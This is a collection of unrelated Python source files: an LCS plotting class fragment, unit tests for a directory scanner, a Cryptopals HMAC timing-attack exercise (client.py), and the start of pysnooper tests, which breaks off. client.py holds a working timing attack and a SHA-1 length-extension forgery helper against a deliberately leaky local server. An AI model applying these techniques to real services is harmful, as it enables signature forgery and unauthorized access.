""""Plots the longest common subsequence curve as (number of accounts, sequence length)
Attributes
----------
lcs_index_ : pandas dataframe, shape (distinct couples (lcs, n_of_accounts), 2), default=None
The dataframe containing the distict couples lcs, n_of_accounts)
Returns
-------
self : returns an instance of self.
"""
plt.xlabel('# of accounts')
plt.ylabel('LCS')
if self.verbosity > Verbosity.MEMORY_ONLY and not hasattr(self, 'lcs_'):
self.lcs_ = pd.read_csv(self.out_path + self.mat_, usecols=['length', 'num_texts']) \
.drop_duplicates().reset_index().drop(['index'], axis=1)
plt.plot(self.lcs_.num_texts, self.lcs_.length, marker='x')
if hasattr(self, 'cut_'):
plt.plot([self.cut_, self.cut_], [0, max(self.lcs_.length)], linestyle='--')
#plt.show()
return plt
def plot_LCS_log(self):
""""Plots the longest common subsequence curve as (log(number of accounts), log(sequence length))
Attributes
----------
lcs_index_ : pandas dataframe, shape (distinct couples (lcs, n_of_accounts), 2), default=None
The dataframe containing the distict couples lcs, n_of_accounts)
Returns
-------
self : returns an instance of self.
"""
plt.xlabel('log(# of accounts)')
plt.ylabel('log(LCS)')
if self.verbosity > Verbosity.MEMORY_ONLY and not hasattr(self, 'lcs_'):
self.lcs_ = pd.read_csv(self.out_path + self.mat_, usecols=['length', 'num_texts']) \
.drop_duplicates().reset_index().drop(['index'], axis=1)
plt.loglog(self.lcs_.num_texts, self.lcs_.length, marker='x')
if hasattr(self, 'cut_'):
plt.plot([self.cut_, self.cut_], [0, max(self.lcs_.length)], linestyle='--')
# plt.show()
return plt
def _decision_function(self, X):
''' Finds the first relative maximum on the smoothed LCS vector'''
length = len(X)
w_size = self.window
X_avg_diff = np.diff(self._running_mean(X, w_size))
i = 0
max_index = length - w_size
for i in range(max_index):
if X_avg_diff[i] < np.mean(X_avg_diff[i:i+w_size]):
break
t = np.argmax(X_avg_diff[i:])
return t + i - 1
def _running_mean(self, x, winsize):
for i in range(len(x)):
x[i] = x[max(0, i):min(i + winsize, len(x))].mean()
return x
def _unicode_to_ascii(self, array):
def f(item):
return str(item) + '\0'
def v(x):
return np.vectorize(f)(x)
return v(array).astype('S')
|
test_scanner.py
|
# Copyright 2017, Inderpreet Singh, All rights reserved.
import os
import shutil
import tempfile
import unittest
from threading import Thread
from datetime import datetime
from system import SystemScanner, SystemScannerError
def my_mkdir(*args):
os.mkdir(os.path.join(TestSystemScanner.temp_dir, *args))
def my_touch(size, *args):
path = os.path.join(TestSystemScanner.temp_dir, *args)
with open(path, 'wb') as f:
f.write(bytearray([0xff] * size))
def my_mkdir_latin(*args):
os.mkdir(os.path.join(TestSystemScanner.temp_dir.encode('latin-1'), *args))
def my_touch_latin(size, *args):
path = os.path.join(TestSystemScanner.temp_dir.encode('latin-1'), *args)
with open(path, 'wb') as f:
f.write(bytearray([0xff] * size))
# noinspection SpellCheckingInspection
class TestSystemScanner(unittest.TestCase):
temp_dir = None
def setUp(self):
# Create a temp directory
TestSystemScanner.temp_dir = tempfile.mkdtemp(prefix="test_system_scanner")
def tearDown(self):
# Cleanup
shutil.rmtree(TestSystemScanner.temp_dir)
def setup_default_tree(self):
# Create a bunch files and directories
# a [dir]
# aa [dir]
# .aaa [dir]
# .aab [file, 512 bytes]
# ab [file, 12*1024 + 4 bytes]
# b [dir]
# ba [dir]
# baa [file, 512 + 7 bytes]
# bb [dir]
# bba [dir]
# bbb [file, 24*1024*1024 + 24 bytes]
# bbc [dir]
# bbca [dir]
# .bbcaa [file, 1 byte
# c [file, 1234 bytes]
my_mkdir("a")
my_mkdir("a", "aa")
my_mkdir("a", "aa", ".aaa")
my_touch(512, "a", "aa", ".aab")
my_touch(12*1024+4, "a", "ab")
my_mkdir("b")
my_mkdir("b", "ba")
my_touch(512+7, "b", "ba", "baa")
my_mkdir("b", "bb")
my_mkdir("b", "bb", "bba")
my_touch(24*1024*1024+24, "b", "bb", "bbb")
my_mkdir("b", "bb", "bbc")
my_mkdir("b", "bb", "bbc", "bbca")
my_touch(1, "b", "bb", "bbc", "bbca", ".bbcaa")
my_touch(1234, "c")
def test_scan_tree(self):
self.setup_default_tree()
scanner = SystemScanner(TestSystemScanner.temp_dir)
files = scanner.scan()
self.assertEqual(3, len(files))
a, b, c = tuple(files)
self.assertEqual("a", a.name)
self.assertTrue(a.is_dir)
self.assertEqual("b", b.name)
self.assertTrue(b.is_dir)
self.assertEqual("c", c.name)
self.assertFalse(c.is_dir)
self.assertEqual(2, len(a.children))
aa, ab = tuple(a.children)
self.assertEqual("aa", aa.name)
self.assertTrue(aa.is_dir)
self.assertEqual(2, len(aa.children))
aaa, aab = tuple(aa.children)
self.assertEqual(".aaa", aaa.name)
self.assertTrue(aaa.is_dir)
self.assertEqual(".aab", aab.name)
self.assertFalse(aab.is_dir)
self.assertEqual("ab", ab.name)
self.assertFalse(ab.is_dir)
self.assertEqual(2, len(b.children))
ba, bb = tuple(b.children)
self.assertEqual("ba", ba.name)
self.assertTrue(ba.is_dir)
self.assertEqual(1, len(ba.children))
baa = ba.children[0]
self.assertEqual("baa", baa.name)
self.assertFalse(baa.is_dir)
self.assertEqual("bb", bb.name)
self.assertTrue(bb.is_dir)
self.assertEqual(3, len(bb.children))
bba, bbb, bbc = tuple(bb.children)
self.assertEqual("bba", bba.name)
self.assertTrue(bba.is_dir)
self.assertEqual("bbb", bbb.name)
self.assertFalse(bbb.is_dir)
self.assertEqual("bbc", bbc.name)
self.assertTrue(bbc.is_dir)
self.assertEqual(1, len(bbc.children))
bbca = bbc.children[0]
self.assertEqual("bbca", bbca.name)
self.assertTrue(bbca.is_dir)
self.assertEqual(1, len(bbca.children))
bbcaa = bbca.children[0]
self.assertEqual(".bbcaa", bbcaa.name)
self.assertFalse(bbcaa.is_dir)
def test_scan_size(self):
self.setup_default_tree()
scanner = SystemScanner(TestSystemScanner.temp_dir)
files = scanner.scan()
self.assertEqual(3, len(files))
a, b, c = tuple(files)
aa, ab = tuple(a.children)
aaa, aab = tuple(aa.children)
ba, bb = tuple(b.children)
baa = ba.children[0]
bba, bbb, bbc = tuple(bb.children)
bbca = bbc.children[0]
bbcaa = bbca.children[0]
self.assertEqual(12*1024+4+512, a.size)
self.assertEqual(512, aa.size)
self.assertEqual(0, aaa.size)
self.assertEqual(512, aab.size)
self.assertEqual(12*1024+4, ab.size)
self.assertEqual(512+7+24*1024*1024+24+1, b.size)
self.assertEqual(512+7, ba.size)
self.assertEqual(512+7, baa.size)
self.assertEqual(24*1024*1024+24+1, bb.size)
self.assertEqual(0, bba.size)
self.assertEqual(24*1024*1024+24, bbb.size)
self.assertEqual(1, bbc.size)
self.assertEqual(1, bbca.size)
self.assertEqual(1, bbcaa.size)
self.assertEqual(1234, c.size)
def test_scan_non_existing_dir_fails(self):
self.setup_default_tree()
scanner = SystemScanner(
path_to_scan=os.path.join(TestSystemScanner.temp_dir, "nonexisting")
)
with self.assertRaises(SystemScannerError) as ex:
scanner.scan()
self.assertTrue(str(ex.exception).startswith("Path does not exist"))
def test_scan_file_fails(self):
self.setup_default_tree()
scanner = SystemScanner(
path_to_scan=os.path.join(TestSystemScanner.temp_dir, "c")
)
with self.assertRaises(SystemScannerError) as ex:
scanner.scan()
self.assertTrue(str(ex.exception).startswith("Path is not a directory"))
def test_scan_single_dir(self):
self.setup_default_tree()
scanner = SystemScanner(TestSystemScanner.temp_dir)
a = scanner.scan_single("a")
self.assertEqual("a", a.name)
self.assertTrue(a.is_dir)
self.assertEqual(2, len(a.children))
aa, ab = tuple(a.children)
self.assertEqual("aa", aa.name)
self.assertTrue(aa.is_dir)
self.assertEqual(2, len(aa.children))
aaa, aab = tuple(aa.children)
self.assertEqual(".aaa", aaa.name)
self.assertTrue(aaa.is_dir)
self.assertEqual(".aab", aab.name)
self.assertFalse(aab.is_dir)
self.assertEqual("ab", ab.name)
self.assertFalse(ab.is_dir)
self.assertEqual(12*1024+4+512, a.size)
self.assertEqual(512, aa.size)
self.assertEqual(0, aaa.size)
self.assertEqual(512, aab.size)
self.assertEqual(12*1024+4, ab.size)
def test_scan_single_file(self):
self.setup_default_tree()
scanner = SystemScanner(TestSystemScanner.temp_dir)
c = scanner.scan_single("c")
self.assertEqual("c", c.name)
self.assertFalse(c.is_dir)
self.assertEqual(1234, c.size)
def test_scan_single_non_existing_path_fails(self):
self.setup_default_tree()
scanner = SystemScanner(
path_to_scan=os.path.join(TestSystemScanner.temp_dir)
)
with self.assertRaises(SystemScannerError) as ex:
scanner.scan_single("nonexisting")
self.assertTrue(str(ex.exception).startswith("Path does not exist"))
def test_scan_tree_excluded_prefix(self):
self.setup_default_tree()
scanner = SystemScanner(TestSystemScanner.temp_dir)
scanner.add_exclude_prefix(".")
files = scanner.scan()
self.assertEqual(3, len(files))
a, b, c = tuple(files)
aa, ab = tuple(a.children)
ba, bb = tuple(b.children)
bba, bbb, bbc = tuple(bb.children)
bbca = bbc.children[0]
self.assertEqual(0, len(aa.children))
self.assertEqual(0, len(bbca.children))
scanner.add_exclude_prefix("ab")
files = scanner.scan()
self.assertEqual(3, len(files))
a, b, c = tuple(files)
self.assertEqual(1, len(a.children))
aa = a.children[0]
ba, bb = tuple(b.children)
bba, bbb, bbc = tuple(bb.children)
bbca = bbc.children[0]
self.assertEqual("aa", aa.name)
self.assertEqual(0, len(bbca.children))
def test_scan_size_excluded_prefix(self):
self.setup_default_tree()
scanner = SystemScanner(TestSystemScanner.temp_dir)
scanner.add_exclude_prefix(".")
files = scanner.scan()
self.assertEqual(3, len(files))
a, b, c = tuple(files)
aa, ab = tuple(a.children)
ba, bb = tuple(b.children)
bba, bbb, bbc = tuple(bb.children)
bbca = bbc.children[0]
self.assertEqual(12*1024+4, a.size)
self.assertEqual(0, aa.size)
self.assertEqual(24*1024*1024+24+0, bb.size)
self.assertEqual(0, bbc.size)
self.assertEqual(0, bbca.size)
scanner.add_exclude_prefix("ab")
files = scanner.scan()
self.assertEqual(3, len(files))
a, b, c = tuple(files)
self.assertEqual(1, len(a.children))
aa = a.children[0]
self.assertEqual("aa", aa.name)
self.assertEqual(0, a.size)
self.assertEqual(0, aa.size)
def test_scan_tree_excluded_suffix(self):
self.setup_default_tree()
scanner = SystemScanner(TestSystemScanner.temp_dir)
scanner.add_exclude_suffix("ab")
scanner.add_exclude_suffix("bb")
files = scanner.scan()
self.assertEqual(3, len(files))
a, b, c = tuple(files)
self.assertEqual(1, len(a.children))
aa = a.children[0]
self.assertEqual("aa", aa.name)
self.assertEqual(1, len(aa.children))
aaa = aa.children[0]
self.assertEqual(".aaa", aaa.name)
self.assertEqual(1, len(b.children))
ba = b.children[0]
self.assertEqual("ba", ba.name)
def test_scan_size_excluded_suffix(self):
self.setup_default_tree()
scanner = SystemScanner(TestSystemScanner.temp_dir)
scanner.add_exclude_suffix("ab")
scanner.add_exclude_suffix("bb")
files = scanner.scan()
a, b, c = tuple(files)
aa = a.children[0]
aaa = aa.children[0]
ba = b.children[0]
self.assertEqual(0, a.size)
self.assertEqual(0, aa.size)
self.assertEqual(0, aaa.size)
self.assertEqual(512+7, b.size)
self.assertEqual(512+7, ba.size)
self.assertEqual(1234, c.size)
def test_lftp_status_file_size(self):
self.setup_default_tree()
scanner = SystemScanner(TestSystemScanner.temp_dir)
size = scanner._lftp_status_file_size("""
size=243644865
0.pos=31457280
0.limit=60911217
1.pos=87060081
1.limit=121822433
2.pos=144268513
2.limit=182733649
3.pos=207473489
3.limit=243644865
""")
self.assertEqual(104792064, size)
def test_scan_lftp_partial_file(self):
tempdir = TestSystemScanner.temp_dir
# Create a partial file
os.mkdir(os.path.join(tempdir, "t"))
path = os.path.join(tempdir, "t", "partial.mkv")
with open(path, 'wb') as f:
f.write(bytearray([0xff] * 24588))
# Write the lftp status out
path = os.path.join(tempdir, "t", "partial.mkv.lftp-pget-status")
with open(path, "w") as f:
f.write("""
size=24588
0.pos=3157
0.limit=6147
1.pos=11578
1.limit=12294
2.pos=12295
2.limit=18441
3.pos=20000
3.limit=24588
""")
scanner = SystemScanner(tempdir)
files = scanner.scan()
self.assertEqual(1, len(files))
t = files[0]
self.assertEqual("t", t.name)
self.assertEqual(10148, t.size)
self.assertEqual(1, len(t.children))
partial_mkv = t.children[0]
self.assertEqual("partial.mkv", partial_mkv.name)
self.assertEqual(10148, partial_mkv.size)
def test_scan_single_lftp_partial_file(self):
# Scan a single partial file
tempdir = TestSystemScanner.temp_dir
# Create a partial file
path = os.path.join(tempdir, "partial.mkv")
with open(path, 'wb') as f:
f.write(bytearray([0xff] * 24588))
# Write the lftp status out
path = os.path.join(tempdir, "partial.mkv.lftp-pget-status")
with open(path, "w") as f:
f.write("""
size=24588
0.pos=3157
0.limit=6147
1.pos=11578
1.limit=12294
2.pos=12295
2.limit=18441
3.pos=20000
3.limit=24588
""")
scanner = SystemScanner(tempdir)
partial_mkv = scanner.scan_single("partial.mkv")
self.assertEqual("partial.mkv", partial_mkv.name)
self.assertEqual(10148, partial_mkv.size)
def test_scan_lftp_temp_file(self):
tempdir = TestSystemScanner.temp_dir
# Create some temp and non-temp files
temp1 = os.path.join(tempdir, "a.mkv.lftp")
with open(temp1, 'wb') as f:
f.write(bytearray([0xff] * 100))
temp2 = os.path.join(tempdir, "b.rar.lftp")
with open(temp2, 'wb') as f:
f.write(bytearray([0xff] * 200))
nontemp1 = os.path.join(tempdir, "c.rar")
with open(nontemp1, 'wb') as f:
f.write(bytearray([0xff] * 300))
nontemp2 = os.path.join(tempdir, "d.lftp.avi")
with open(nontemp2, 'wb') as f:
f.write(bytearray([0xff] * 400))
nontemp3 = os.path.join(tempdir, "e")
os.mkdir(nontemp3)
temp3 = os.path.join(nontemp3, "ea.txt.lftp")
with open(temp3, 'wb') as f:
f.write(bytearray([0xff] * 500))
nontemp4 = os.path.join(tempdir, "f.lftp")
os.mkdir(nontemp4)
scanner = SystemScanner(tempdir)
# No temp suffix set
files = scanner.scan()
self.assertEqual(6, len(files))
a, b, c, d, e, f = tuple(files)
self.assertEqual("a.mkv.lftp", a.name)
self.assertEqual(100, a.size)
self.assertEqual(False, a.is_dir)
self.assertEqual("b.rar.lftp", b.name)
self.assertEqual(200, b.size)
self.assertEqual(False, b.is_dir)
self.assertEqual("c.rar", c.name)
self.assertEqual(300, c.size)
self.assertEqual(False, c.is_dir)
self.assertEqual("d.lftp.avi", d.name)
self.assertEqual(400, d.size)
self.assertEqual(False, d.is_dir)
self.assertEqual("e", e.name)
self.assertEqual(500, e.size)
self.assertEqual(True, e.is_dir)
self.assertEqual(1, len(e.children))
ea = e.children[0]
self.assertEqual("ea.txt.lftp", ea.name)
self.assertEqual(500, ea.size)
self.assertEqual(False, ea.is_dir)
self.assertEqual("f.lftp", f.name)
self.assertEqual(0, f.size)
self.assertEqual(True, f.is_dir)
# Temp suffix set
scanner.set_lftp_temp_suffix(".lftp")
files = scanner.scan()
self.assertEqual(6, len(files))
a, b, c, d, e, f = tuple(files)
self.assertEqual("a.mkv", a.name)
self.assertEqual(100, a.size)
self.assertEqual(False, a.is_dir)
self.assertEqual("b.rar", b.name)
self.assertEqual(200, b.size)
self.assertEqual(False, b.is_dir)
self.assertEqual("c.rar", c.name)
self.assertEqual(300, c.size)
self.assertEqual(False, c.is_dir)
self.assertEqual("d.lftp.avi", d.name)
self.assertEqual(400, d.size)
self.assertEqual(False, d.is_dir)
self.assertEqual("e", e.name)
self.assertEqual(500, e.size)
self.assertEqual(True, e.is_dir)
self.assertEqual(1, len(e.children))
ea = e.children[0]
self.assertEqual("ea.txt", ea.name)
self.assertEqual(500, ea.size)
self.assertEqual(False, ea.is_dir)
self.assertEqual("f.lftp", f.name)
self.assertEqual(0, f.size)
self.assertEqual(True, f.is_dir)
def test_scan_single_lftp_temp_file(self):
tempdir = TestSystemScanner.temp_dir
# Create:
# temp file
# non-temp file and
# non-temp directory with temp name
# non-temp directory with non-temp name
temp1 = os.path.join(tempdir, "a.mkv.lftp")
with open(temp1, 'wb') as f:
f.write(bytearray([0xff] * 100))
nontemp1 = os.path.join(tempdir, "b.rar")
with open(nontemp1, 'wb') as f:
f.write(bytearray([0xff] * 300))
nontemp2 = os.path.join(tempdir, "c.lftp")
os.mkdir(nontemp2)
temp2 = os.path.join(nontemp2, "c.txt.lftp")
with open(temp2, 'wb') as f:
f.write(bytearray([0xff] * 500))
nontemp3 = os.path.join(tempdir, "d")
os.mkdir(nontemp3)
temp3 = os.path.join(nontemp3, "d.avi.lftp")
with open(temp3, 'wb') as f:
f.write(bytearray([0xff] * 600))
scanner = SystemScanner(tempdir)
# No temp suffix set, must include temp suffix in name param
file = scanner.scan_single("a.mkv.lftp")
self.assertEqual("a.mkv.lftp", file.name)
self.assertEqual(100, file.size)
self.assertEqual(False, file.is_dir)
file = scanner.scan_single("b.rar")
self.assertEqual("b.rar", file.name)
self.assertEqual(300, file.size)
self.assertEqual(False, file.is_dir)
file = scanner.scan_single("c.lftp")
self.assertEqual("c.lftp", file.name)
self.assertEqual(500, file.size)
self.assertEqual(True, file.is_dir)
self.assertEqual(1, len(file.children))
child = file.children[0]
self.assertEqual("c.txt.lftp", child.name)
self.assertEqual(500, child.size)
self.assertEqual(False, child.is_dir)
file = scanner.scan_single("d")
self.assertEqual("d", file.name)
self.assertEqual(600, file.size)
self.assertEqual(True, file.is_dir)
child = file.children[0]
self.assertEqual("d.avi.lftp", child.name)
self.assertEqual(600, child.size)
self.assertEqual(False, child.is_dir)
# Temp suffix set, must NOT include temp suffix in name param
scanner.set_lftp_temp_suffix(".lftp")
file = scanner.scan_single("a.mkv")
self.assertEqual("a.mkv", file.name)
self.assertEqual(100, file.size)
self.assertEqual(False, file.is_dir)
file = scanner.scan_single("b.rar")
self.assertEqual("b.rar", file.name)
self.assertEqual(300, file.size)
self.assertEqual(False, file.is_dir)
file = scanner.scan_single("c.lftp")
self.assertEqual("c.lftp", file.name)
self.assertEqual(500, file.size)
self.assertEqual(True, file.is_dir)
self.assertEqual(1, len(file.children))
child = file.children[0]
self.assertEqual("c.txt", child.name)
self.assertEqual(500, child.size)
self.assertEqual(False, child.is_dir)
# also, shouldn't look for directories with temp suffix
with self.assertRaises(SystemScannerError) as ctx:
scanner.scan_single("c")
self.assertTrue("Path does not exist" in str(ctx.exception))
file = scanner.scan_single("d")
self.assertEqual("d", file.name)
self.assertEqual(600, file.size)
self.assertEqual(True, file.is_dir)
child = file.children[0]
self.assertEqual("d.avi", child.name)
self.assertEqual(600, child.size)
self.assertEqual(False, child.is_dir)
# No file and no temp file
with self.assertRaises(SystemScannerError) as ctx:
scanner.scan_single("blah")
self.assertTrue("Path does not exist" in str(ctx.exception))
def test_files_deleted_while_scanning(self):
self.setup_default_tree()
scanner = SystemScanner(TestSystemScanner.temp_dir)
stop = False
# Make and delete files while test runs
def monkey_with_files():
orig = os.path.join(TestSystemScanner.temp_dir, "b")
dest = os.path.join(TestSystemScanner.temp_dir, "b_copy")
while not stop:
shutil.copytree(orig, dest)
shutil.rmtree(dest)
thread = Thread(target=monkey_with_files)
thread.start()
try:
# Scan a bunch of times
for i in range(0, 2000):
files = scanner.scan()
# Must have at least the untouched files
self.assertGreaterEqual(len(files), 3)
names = set([f.name for f in files])
self.assertIn("a", names)
self.assertIn("b", names)
self.assertIn("c", names)
finally:
stop = True
thread.join()
def test_scan_modified_time(self):
self.setup_default_tree()
# directory
os.utime(
os.path.join(TestSystemScanner.temp_dir, "a"),
(
datetime.now().timestamp(),
datetime(2018, 11, 9, 21, 40, 18).timestamp()
)
)
# file
os.utime(
os.path.join(TestSystemScanner.temp_dir, "c"),
(
datetime.now().timestamp(),
datetime(2018, 11, 9, 21, 40, 17).timestamp()
)
)
scanner = SystemScanner(TestSystemScanner.temp_dir)
files = scanner.scan()
self.assertEqual(3, len(files))
a, b, c = tuple(files)
self.assertEqual(datetime(2018, 11, 9, 21, 40, 18), a.timestamp_modified)
self.assertEqual(datetime(2018, 11, 9, 21, 40, 17), c.timestamp_modified)
def test_scan_file_with_unicode_chars(self):
tempdir = TestSystemScanner.temp_dir
# déģķ [dir]
# dőÀ× [file, 128 bytes]
my_mkdir("déģķ")
my_touch(128, "dőÀ")
scanner = SystemScanner(tempdir)
files = scanner.scan()
self.assertEqual(2, len(files))
folder, file = tuple(files)
self.assertEqual(0, len(folder.children))
self.assertEqual("déģķ", folder.name)
self.assertEqual("dőÀ", file.name)
self.assertEqual(128, file.size)
def test_scan_file_with_latin_chars(self):
tempdir = TestSystemScanner.temp_dir
# a\xe9b [dir]
# c\xe9d [file, 128 bytes]
my_mkdir_latin(b"dir\xe9dir")
my_touch_latin(128, b"file\xd9file")
scanner = SystemScanner(tempdir)
files = scanner.scan()
self.assertEqual(2, len(files))
folder, file = tuple(files)
self.assertEqual(0, len(folder.children))
self.assertEqual("dir�dir", folder.name)
self.assertEqual("file�file", file.name)
self.assertEqual(128, file.size)
|
client.py
|
#! /usr/bin/python
# https://www.cryptopals.com/sets/4/challenges/31
# Implement and break HMAC-SHA1 with an artificial timing leak
# SHA-1 implementation taken from https://github.com/ajalt/python-sha1/blob/master/sha1.py
# HMAC: https://en.wikipedia.org/wiki/HMAC
################################################################################
### SHA-1 ######################################################################
################################################################################
import struct
import io
from time import sleep
import requests
try:
range = xrange
except NameError:
pass
def _left_rotate(n, b):
"""Left rotate a 32-bit integer n by b bits."""
return ((n << b) | (n >> (32 - b))) & 0xffffffff
def _process_chunk(chunk, h0, h1, h2, h3, h4):
"""Process a chunk of data and return the new digest variables."""
assert len(chunk) == 64
#print "Chunk:",[chunk]
#print "Process chunk [before]:",(hex(h0),hex(h1),hex(h2),hex(h3),hex(h4))
w = [0] * 80
# Break chunk into sixteen 4-byte big-endian words w[i]
for i in range(16):
w[i] = struct.unpack(b'>I', chunk[i * 4:i * 4 + 4])[0]
# Extend the sixteen 4-byte words into eighty 4-byte words
for i in range(16, 80):
w[i] = _left_rotate(w[i - 3] ^ w[i - 8] ^ w[i - 14] ^ w[i - 16], 1)
# Initialize hash value for this chunk
a = h0
b = h1
c = h2
d = h3
e = h4
for i in range(80):
if 0 <= i <= 19:
# Use alternative 1 for f from FIPS PB 180-1 to avoid bitwise not
f = d ^ (b & (c ^ d))
k = 0x5A827999
elif 20 <= i <= 39:
f = b ^ c ^ d
k = 0x6ED9EBA1
elif 40 <= i <= 59:
f = (b & c) | (b & d) | (c & d)
k = 0x8F1BBCDC
elif 60 <= i <= 79:
f = b ^ c ^ d
k = 0xCA62C1D6
a, b, c, d, e = ((_left_rotate(a, 5) + f + e + k + w[i]) & 0xffffffff,
a, _left_rotate(b, 30), c, d)
# Add this chunk's hash to result so far
h0 = (h0 + a) & 0xffffffff
h1 = (h1 + b) & 0xffffffff
h2 = (h2 + c) & 0xffffffff
h3 = (h3 + d) & 0xffffffff
h4 = (h4 + e) & 0xffffffff
#print "Process chunk [after]:",(hex(h0),hex(h1),hex(h2),hex(h3),hex(h4))
return h0, h1, h2, h3, h4
class Sha1Hash(object):
"""A class that mimics that hashlib api and implements the SHA-1 algorithm."""
name = 'python-sha1'
digest_size = 20
block_size = 64
def __init__(self,h0=0x67452301,h1=0xEFCDAB89,h2=0x98BADCFE,h3=0x10325476,h4=0xC3D2E1F0,length_offset=0):
# Initial digest variables
self._h = (
h0,
h1,
h2,
h3,
h4,
)
# bytes object with 0 <= len < 64 used to store the end of the message
# if the message length is not congruent to 64
self._unprocessed = b''
# Length in bytes of all data that has been processed so far
self._message_byte_length = length_offset
def update(self, arg):
"""Update the current digest.
This may be called repeatedly, even after calling digest or hexdigest.
Arguments:
arg: bytes, bytearray, or BytesIO object to read from.
"""
if isinstance(arg, (bytes, bytearray)):
arg = io.BytesIO(arg)
# Try to build a chunk out of the unprocessed data, if any
chunk = self._unprocessed + arg.read(64 - len(self._unprocessed))
# Read the rest of the data, 64 bytes at a time
while len(chunk) == 64:
self._h = _process_chunk(chunk, *self._h)
self._message_byte_length += 64
chunk = arg.read(64)
self._unprocessed = chunk
#print self._unprocessed
return self
def digest(self):
"""Produce the final hash value (big-endian) as a bytes object"""
return b''.join(struct.pack(b'>I', h) for h in self._produce_digest())
def hexdigest(self):
"""Produce the final hash value (big-endian) as a hex string"""
return '%08x%08x%08x%08x%08x' % self._produce_digest()
def _produce_digest(self):
"""Return finalized digest variables for the data processed so far."""
# Pre-processing:
message = self._unprocessed
message_byte_length = self._message_byte_length + len(message)
# append the bit '1' to the message
message += b'\x80'
# append 0 <= k < 512 bits '0', so that the resulting message length (in bytes)
# is congruent to 56 (mod 64)
message += b'\x00' * ((56 - (message_byte_length + 1) % 64) % 64)
# append length of message (before pre-processing), in bits, as 64-bit big-endian integer
message_bit_length = message_byte_length * 8
#print message_bit_length
message += struct.pack(b'>Q', message_bit_length)
# Process the final chunk
# At this point, the length of the message is either 64 or 128 bytes.
h = _process_chunk(message[:64], *self._h)
if len(message) == 64:
#print (hex(h[0]),hex(h[1]),hex(h[2]),hex(h[3]),hex(h[4]))
return h
#print (hex(h[0]),hex(h[1]),hex(h[2]),hex(h[3]),hex(h[4]))
return _process_chunk(message[64:], *h)
def sha1(data,h0=None,h1=None,h2=None,h3=None,h4=None,length_offset=0):
"""SHA-1 Hashing Function
A custom SHA-1 hashing function implemented entirely in Python.
Arguments:
data: A bytes or BytesIO object containing the input message to hash.
Returns:
A hex SHA-1 digest of the input message.
"""
if h0 and h1 and h2 and h3 and h4:
return Sha1Hash(h0,h1,h2,h3,h4,length_offset).update(data).hexdigest()
return Sha1Hash().update(data).hexdigest()
################################################################################
################################################################################
def xor(a,b):
raw_a = a
raw_b = b
return "".join([chr(ord(raw_a[i])^ord(raw_b[i])) for i in range(len(raw_a))])
def MAC_SHA1(message,key):
return sha1(key+message)
def fake_message(original_message,new_message,sha1_hash,min_key=0,max_key=40):
possible_hashes = []
h = [int(sha1_hash[0+i:8+i],16) for i in range(0,40,8)]
#print "TEST:",map(hex,h)
for i in range(min_key,max_key+1):
pad = padding("A"*i+original_message)
possible_hashes.append((original_message+pad+new_message,sha1(new_message,h[0],h[1],h[2],h[3],h[4],i+len(original_message)+len(pad))))
return possible_hashes
def verify_mac_sha1(message,h):
#print key
return MAC_SHA1(message,key) == h
def padding(data):
message_byte_length = len(data)
# append the bit '1' to the message
pad = b'\x80'
# append 0 <= k < 512 bits '0', so that the resulting message length (in bytes)
# is congruent to 56 (mod 64)
pad += b'\x00' * ((56 - (message_byte_length + 1) % 64) % 64)
message_bit_length = message_byte_length * 8
#print message_bit_length
pad += struct.pack(b'>Q', message_bit_length)
return pad
def main():
global app
global table
table = {}
#x = threading.Thread(target=app.run)
print find_valid_hmac("TEST").encode("hex")
#original says 50ms but FML
def find_valid_hmac(name):
delay = 0.05
url = "http://127.0.0.1:5000/test?file="+name+"&signature="
x = ""
r = requests.get(url)
while len(x) < 20:
for i in range(255):
#sleep(0.05) #to avoid DoSing the server
r = requests.get(url+(x+chr(i)).encode("hex"))
if r.elapsed.total_seconds() > (1+len(x))*delay:
x += chr(i)
print x.encode("hex")
break
del(r)
return x
def HMAC_SHA1(data,k,blocksize=64):
global table
if data in table:
return table[data] #optimising the code so my laptop won't cook my balls
if len(k) > blocksize:
k = sha1(k).decode("hex")
if len(k) < blocksize:
k = k + "\x00"*(blocksize-len(k))
print [k]
o_key_pad = xor(k,"\x5c"*blocksize)
i_key_pad = xor(k,"\x36"*blocksize)
h = sha1(o_key_pad + sha1(i_key_pad + data).decode("hex"))
table[data] = h
return h
from flask import Flask,request,abort
import threading
global app
app = Flask(__name__)
@app.route('/test', methods=['GET'])
def test():
f = request.args.get('file').encode('ascii')
signature = request.args.get('signature').encode('ascii')
key = "bob"
h = HMAC_SHA1(f,key)
print h
h = h.decode('hex')
s = signature.decode('hex')
for i in range(len(h)):
if i >= len(s) or h[i] != s[i]:
abort(500)
sleep(0.05)
return 'OK'
import socket
def server():
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = ('127.0.0.1', 5000)
sock.bind(server_address)
sock.listen(1)
while True:
connection, client_address = sock.accept()
print "Connection accepted"
data = connection.recv(2048)
x = data.split(' ')[1].split('?')[1].split('&')
d = {}
for i in x:
t = i.split('=')
d[t[0]] = t[1]
f = d['file']
signature = d['signature']
print signature
key = "bob"
h = HMAC_SHA1(f,key)
print h
h = h.decode('hex')
s = signature.decode('hex')
flag = False
for i in range(len(h)):
if i >= len(s) or h[i] != s[i]:
connection.sendall("HTTP/1.1 500 BAD")
flag = True
break
sleep(0.05)
if flag:
connection.sendall("HTTP/1.1 200 OK")
connection.close()
#@app.route('/kill', methods=['GET'])
#def death():
# exit()
main()
|
test_pysnooper.py
|
# Copyright 2019 Ram Rachum and collaborators.
# This program is distributed under the MIT license.
import io
import textwrap
import threading
import types
import os
import sys
from pysnooper.utils import truncate
import pytest
import pysnooper
from pysnooper.variables import needs_parentheses
from .utils import (assert_output, assert_sample_output, VariableEntry,
CallEntry, LineEntry, ReturnEntry, OpcodeEntry,
ReturnValueEntry, ExceptionEntry, SourcePathEntry)
from . import mini_toolbox
def test_string_io():
string_io = io.StringIO()
@pysnooper.snoop(string_io)
def my_function(foo):
x = 7
y = 8
return y + x
result = my_function('baba')
assert result == 15
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('foo', value_regex="u?'baba'"),
CallEntry('def my_function(foo):'),
LineEntry('x = 7'),
VariableEntry('x', '7'),
LineEntry('y = 8'),
VariableEntry('y', '8'),
LineEntry('return y + x'),
ReturnEntry('return y + x'),
ReturnValueEntry('15'),
)
)
def test_thread_info():
@pysnooper.snoop(thread_info=True)
def my_function(foo):
x = 7
y = 8
return y + x
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = my_function('baba')
assert result == 15
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
